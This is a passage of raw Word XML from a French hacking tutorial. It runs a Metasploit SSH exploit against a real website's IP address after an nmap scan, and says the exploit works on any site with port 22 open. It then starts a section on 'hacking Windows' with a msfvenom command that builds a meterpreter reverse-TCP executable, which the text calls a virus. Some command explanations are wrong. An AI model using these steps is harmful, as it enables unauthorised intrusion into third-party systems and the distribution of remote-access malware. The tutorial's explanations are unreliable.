        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001E14C5">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001E14C5">
        <w:t xml:space="preserve"> : Utilisation de l'exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A785D" w14:textId="77777777" w:rsidR="00A7319C" w:rsidRPr="001E14C5" w:rsidRDefault="00A7319C" w:rsidP="00D6524A"/>
    <w:p w14:paraId="75BB05BA" w14:textId="2FDBA79C" w:rsidR="00A7319C" w:rsidRPr="001E14C5" w:rsidRDefault="001E14C5" w:rsidP="00D6524A">
      <w:r w:rsidRPr="001E14C5">
        <w:t>La prochaine commande à utiliser est :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F787AD2" w14:textId="55B2DB64" w:rsidR="001E14C5" w:rsidRDefault="001E14C5" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE73E04" w14:textId="77777777" w:rsidR="001E14C5" w:rsidRDefault="001E14C5" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001E14C5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5481CC84" wp14:editId="02C5463B">
            <wp:extent cx="5760720" cy="1042035"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="1411608689"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08689" name="Image 1" descr="Une image contenant texte, Police, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1042035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3C3DDD" w14:textId="7D849B46" w:rsidR="001E14C5" w:rsidRPr="000838E0" w:rsidRDefault="001E14C5" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000838E0">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000838E0">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C74497">
        <w:t> : utilisation de la commande show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E19CAF4" w14:textId="7F60BD23" w:rsidR="001E14C5" w:rsidRDefault="000838E0" w:rsidP="00D6524A">
      <w:r w:rsidRPr="000838E0">
        <w:t>On doit définir RHOST qui est l’adresse IP de la cible</w:t>
      </w:r>
      <w:r>
        <w:t>, pour cela on doit analyser le site web pour obtenir l’adresse IP. Vu que nmap est intégré à metasploit, nous pouvons utiliser directement la commande suivante sans ouvrir de nouveau terminal</w:t>
      </w:r>
      <w:r w:rsidR="00591552">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305CB123" w14:textId="77777777" w:rsidR="00544C4D" w:rsidRDefault="00544C4D" w:rsidP="00D6524A"/>
    <w:p w14:paraId="166E0089" w14:textId="52F7705F" w:rsidR="00591552" w:rsidRDefault="00591552" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00591552">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap –A opentechinfo.com –p 22 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00591552">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14A7E20F" w14:textId="77777777" w:rsidR="00544C4D" w:rsidRDefault="00544C4D" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B85EB75" w14:textId="5A2EC023" w:rsidR="00591552" w:rsidRDefault="00382758" w:rsidP="00D6524A">
      <w:r w:rsidRPr="00382758">
        <w:t>Expliquons cette commande, –</w:t>
      </w:r>
      <w:r w:rsidRPr="00382758">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00382758">
        <w:t xml:space="preserve"> est le nom d’hôte et –</w:t>
      </w:r>
      <w:r w:rsidRPr="00382758">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00382758">
        <w:t xml:space="preserve"> pour le port car il y a 65000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00382758">
        <w:t>ports</w:t>
      </w:r>
      <w:r w:rsidR="00D41FCC">
        <w:t>, s</w:t>
      </w:r>
      <w:r w:rsidRPr="00382758">
        <w:t>canner tous les ports prend beaucoup de temps, mais comme SSH utilise le port 22,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on l’a</w:t>
      </w:r>
      <w:r w:rsidRPr="00382758">
        <w:t xml:space="preserve"> déjà spécifié pour gagner du temps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDA7D1B" w14:textId="6011F2DE" w:rsidR="00C40482" w:rsidRDefault="00C40482" w:rsidP="00D6524A"/>
    <w:p w14:paraId="352624FD" w14:textId="723287F5" w:rsidR="00C40482" w:rsidRDefault="00C40482" w:rsidP="00D6524A">
      <w:r>
        <w:t xml:space="preserve">Voici ce que cela donne en tapant la commande : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4986E125" w14:textId="51D71862" w:rsidR="00C40482" w:rsidRPr="00C40482" w:rsidRDefault="00C40482" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00591552">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap –A opentechinfo.com –p 22 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00591552">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B0A5B02" w14:textId="77777777" w:rsidR="00C40482" w:rsidRPr="00C40482" w:rsidRDefault="00C40482" w:rsidP="00D6524A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="129FE21B" w14:textId="77777777" w:rsidR="00C40482" w:rsidRDefault="00C40482" w:rsidP="00D6524A">
      <w:r w:rsidRPr="00C40482">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E4BAEE6" wp14:editId="4DB049C6">
            <wp:extent cx="5760720" cy="3746500"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="159989842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98426" name="Image 1" descr="Une image contenant texte, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3746500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="600476F2" w14:textId="289BDD54" w:rsidR="00C40482" w:rsidRPr="00382758" w:rsidRDefault="00C40482" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C32D66">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C32D66">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A9C4F7" w14:textId="77777777" w:rsidR="001E14C5" w:rsidRDefault="001E14C5" w:rsidP="00D6524A"/>
    <w:p w14:paraId="7FAB8F82" w14:textId="722CEA89" w:rsidR="00315D8D" w:rsidRDefault="00136422" w:rsidP="00D6524A">
      <w:r>
        <w:t xml:space="preserve">Comme on peut le voir à la figure 7, </w:t>
      </w:r>
      <w:r w:rsidR="00315D8D">
        <w:t xml:space="preserve">l’adresse IP est donc : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1795E492" w14:textId="15905DDB" w:rsidR="00315D8D" w:rsidRDefault="00315D8D" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>104.18.2.46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61218E0E" w14:textId="77777777" w:rsidR="00CA324D" w:rsidRDefault="00315D8D" w:rsidP="00E5031B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00315D8D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F40ACB6" wp14:editId="13FAC885">
            <wp:extent cx="4964419" cy="2562104"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3810"/>
            <wp:docPr id="53186614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66141" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4970847" cy="2565422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="628F1CA8" w14:textId="744528DD" w:rsidR="00315D8D" w:rsidRDefault="00CA324D" w:rsidP="00E5031B">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="234048FE" w14:textId="77777777" w:rsidR="00CA324D" w:rsidRPr="00CA324D" w:rsidRDefault="00CA324D" w:rsidP="00D6524A"/>
    <w:p w14:paraId="2DAEBC0B" w14:textId="7DDF7E1C" w:rsidR="00CC7BB2" w:rsidRDefault="00D227A8" w:rsidP="00D6524A">
      <w:r>
        <w:t>Maintenons</w:t>
      </w:r>
      <w:r w:rsidR="00E5031B">
        <w:t>, mettons cet adresse IP en adresse IP CIBLE avec la commande suivante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAD5CF9" w14:textId="78041913" w:rsidR="00D227A8" w:rsidRDefault="00D227A8" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00E5031B">
        <w:t xml:space="preserve">Set RHOST </w:t>
      </w:r>
      <w:r>
        <w:t>104.18.2.46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062ED765" w14:textId="77777777" w:rsidR="00B77123" w:rsidRDefault="00B77123" w:rsidP="00D6524A">
      <w:r w:rsidRPr="00B77123">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="018ABBA8" wp14:editId="497A0592">
            <wp:extent cx="5760720" cy="596900"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="10897464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46453" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="596900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18955570" w14:textId="4B08FA6E" w:rsidR="00B77123" w:rsidRPr="00FF2862" w:rsidRDefault="00B77123" w:rsidP="00E5031B">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF2862">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FF2862">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DA223A" w14:textId="2B5C6640" w:rsidR="007E2ACC" w:rsidRPr="00FF2862" w:rsidRDefault="00FF2862" w:rsidP="00D6524A">
      <w:r w:rsidRPr="00FF2862">
        <w:lastRenderedPageBreak/>
        <w:t>Et utilisons la commande</w:t>
      </w:r>
      <w:r w:rsidR="00E5031B">
        <w:t xml:space="preserve"> suivante pour exécuter l’exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF2862">
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622B8700" w14:textId="6BF1475A" w:rsidR="00FF2862" w:rsidRPr="00242D47" w:rsidRDefault="00FF2862" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00242D47">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103D87C4" w14:textId="77777777" w:rsidR="00D6524A" w:rsidRPr="00242D47" w:rsidRDefault="00D6524A" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EAA1217" w14:textId="77777777" w:rsidR="00FF2862" w:rsidRDefault="00FF2862" w:rsidP="00D6524A">
      <w:r w:rsidRPr="00FF2862">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E69C0F9" wp14:editId="1891F906">
            <wp:extent cx="5760720" cy="903605"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="83180715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7156" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="903605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6E929E" w14:textId="6F02855E" w:rsidR="00FF2862" w:rsidRPr="0088449B" w:rsidRDefault="00FF2862" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0088449B">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0088449B">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0088449B">
        <w:t xml:space="preserve"> : utilisation de la commande run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71722F24" w14:textId="073022E5" w:rsidR="0088449B" w:rsidRDefault="0088449B" w:rsidP="00D6524A">
      <w:r w:rsidRPr="0088449B">
        <w:t>Le port 22 est fermé, donc cela ne fonctionnera pas</w:t>
      </w:r>
      <w:r>
        <w:t>, pas besoin d’être triste, cela marche sur tout autre site où le port 22 est ouvert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743D673A" w14:textId="77777777" w:rsidR="00C34E6D" w:rsidRDefault="00C34E6D" w:rsidP="00D6524A"/>
    <w:p w14:paraId="1AA250A6" w14:textId="6AF9E1EC" w:rsidR="00C34E6D" w:rsidRDefault="005703C0" w:rsidP="005703C0">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc197957009"/>
      <w:r>
        <w:t>Partie avec msfvenom : Pirater Windows avec Metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="7FA1C9A6" w14:textId="08A53DE9" w:rsidR="005703C0" w:rsidRDefault="005703C0" w:rsidP="00D6524A">
      <w:r>
        <w:t xml:space="preserve">Premièrement, prenez votre IP avec la commande suivante : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DF9EB3" w14:textId="696CBAC3" w:rsidR="005703C0" w:rsidRDefault="00F241C2" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00F241C2">
        <w:t xml:space="preserve">ipconfig </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F241C2">
        <w:t>getifaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F241C2">
        <w:t xml:space="preserve"> en0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3131C4" w14:textId="77777777" w:rsidR="00242D47" w:rsidRPr="005703C0" w:rsidRDefault="00242D47" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D0292DB" w14:textId="34E7766B" w:rsidR="005703C0" w:rsidRDefault="005703C0" w:rsidP="00D6524A">
      <w:r>
        <w:t>Entrons maintenant la commande suivante :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521C2F14" w14:textId="0E8867DF" w:rsidR="005703C0" w:rsidRDefault="005703C0" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005703C0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom –p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005703C0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005703C0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> –f exe –a x86 –platform windows  LHOST </w:t>
      </w:r>
      <w:r w:rsidR="00D6524A" w:rsidRPr="00D6524A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VOTREADRESSEIP</w:t>
      </w:r>
      <w:r w:rsidRPr="005703C0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT 4444 –o santy.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE50AA3" w14:textId="77777777" w:rsidR="00D6524A" w:rsidRDefault="00D6524A" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA520E2" w14:textId="77777777" w:rsidR="00D6524A" w:rsidRDefault="00D6524A" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3FC031" w14:textId="77777777" w:rsidR="00D6524A" w:rsidRDefault="00D6524A" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EB18C34" w14:textId="63EA56D8" w:rsidR="005703C0" w:rsidRDefault="005703C0" w:rsidP="00D6524A">
      <w:r w:rsidRPr="005703C0">
        <w:t xml:space="preserve">Expliquons </w:t>
      </w:r>
      <w:r w:rsidR="00D6524A">
        <w:t>la commande</w:t>
      </w:r>
      <w:r w:rsidRPr="005703C0">
        <w:t xml:space="preserve"> plus en d</w:t>
      </w:r>
      <w:r>
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidRPr="005703C0">
        <w:t>tail :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35725CC9" w14:textId="7C4A89A4" w:rsidR="006E657A" w:rsidRDefault="006E657A" w:rsidP="00502E61">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Symbol"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -p prépare le payload. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E6169" w14:textId="26008066" w:rsidR="006E657A" w:rsidRDefault="006E657A" w:rsidP="00502E61">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Symbol"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -f exe indique que le type de fichier, ou l’extension de fichier sera</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CBE38A" w14:textId="414C4504" w:rsidR="006E657A" w:rsidRDefault="006E657A" w:rsidP="00502E61">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Symbol"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -a x86 indique l’architecture système. x86 est utilisée dans les systèmes 32 bits, même si mon système est en 64 bits, on peut faire tourner un programme 32 bits sur un système 64 bits. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E522A3" w14:textId="290D2397" w:rsidR="006E657A" w:rsidRDefault="006E657A" w:rsidP="00502E61">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Symbol"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> –platform windows indique que ce virus est pour Windows. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFD54CF" w14:textId="78C07BB9" w:rsidR="006E657A" w:rsidRDefault="006E657A" w:rsidP="00502E61">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Symbol"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -o est le chemin d’enregistrement du fichier, avec son nom. Comme </w:t>
      </w:r>
      <w:r w:rsidR="00CB6A68">
        <w:t xml:space="preserve">on veut </w:t>
      </w:r>
      <w:r>
        <w:t>l’enregistrer dans le dossier root, je ne précise que son nom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C3D227" w14:textId="77777777" w:rsidR="00CB6A68" w:rsidRDefault="00CB6A68" w:rsidP="00D6524A"/>
    <w:p w14:paraId="7ED42B2F" w14:textId="54D0AE9A" w:rsidR="00CB6A68" w:rsidRDefault="00CB6A68" w:rsidP="00D6524A">
      <w:r>
        <w:t>Voici ce que l’on va obtenir après avoir tapé</w:t>
      </w:r>
      <w:r w:rsidR="0021437D">
        <w:t xml:space="preserve"> et exécuté</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la commande : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31539791" w14:textId="1E154F34" w:rsidR="00CB6A68" w:rsidRDefault="00CB6A68" w:rsidP="00D6524A"/>
    <w:p w14:paraId="6DAD150F" w14:textId="77777777" w:rsidR="009B56EB" w:rsidRDefault="009B56EB" w:rsidP="00D6524A">
      <w:r w:rsidRPr="009B56EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DF0D304" wp14:editId="4DFE5F2A">
            <wp:extent cx="5750220" cy="380304"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="11639975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97575" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5863565" cy="387800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="036A6B53" w14:textId="2C4347F7" w:rsidR="00EE1788" w:rsidRPr="00742784" w:rsidRDefault="009B56EB" w:rsidP="00242D47">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
